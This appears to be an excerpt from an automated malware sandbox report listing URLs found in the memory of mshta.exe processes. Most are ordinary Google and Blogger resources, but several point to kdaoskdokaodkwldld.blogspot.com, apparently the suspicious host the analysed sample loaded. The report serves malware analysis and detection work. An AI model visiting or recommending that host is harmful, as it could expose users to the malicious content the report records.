Source: mshta.exe, 00000010.00000003.485867310.0000000002AB0000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/searchhttps://kdaoskdokaodkwldld.blogspot.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://keep.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://photos.google.com/?tab=jq&pageId=none
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://podcasts.google.com/
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/1.1
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/45
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.500836105.000000000560D000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png.NET4.0E)2
Source: mshta.exe, 00000010.00000002.500649887.00000000055DB000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0%2C009%2C0
Source: mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngli=10E)
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngight.pngt.com%2Fp%2F30.ht
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500891130.0000000005619000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/oss-Column
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://resources.blogblog.com/px
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://stadia.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://translate.google.co.uk/?hl=de&tab=jT
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmp String found in binary or memory: https://www.bloggeefD.
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com%2C0
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/-
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/1%2
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/Q
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/age-verification.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.
Source: mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26t
Source: mshta.exe, 00000010.00000002.500488420.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.
Source: mshta.exe, 00000010.00000003.484440784.00000000055CF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&t
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=
Source: mshta.exe, 00000010.00000003.484440784.00000000055CF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-e
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.496743401.000000000023E000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/3903609419317699398/posts/default
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsN7
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.483617923.0000000005AE5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485261587.0000000002AA7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484816374.000000000026C000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js.css
Source: mshta.exe, 00000010.00000003.494471731.0000000002625000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485665591.0000000002623000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.jsTb
Source: mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css&
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css0EgG.
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css1
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.csspng
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485785054.000000000262A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.493952509.000000000262D000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485665591.0000000002623000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494460143.0000000002630000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.js
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.js903609419317699398&zx=5f07c876-ed15-4
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.jsC0
Source: mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1397508952-widgets.jsjs/pv7
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css7YD.
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.csskYD.
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.comu$G.
Source: mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495236095.00000000055EB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js30
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsm
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/ml
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/s
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/de/about/products?tab=jh
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/save
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=de&source=og&tab=jf
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495236095.00000000055EB000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/1#%HC1IiG.
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/57%2
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launc
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css57
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssY
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssily=Open
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/finance?tab=je
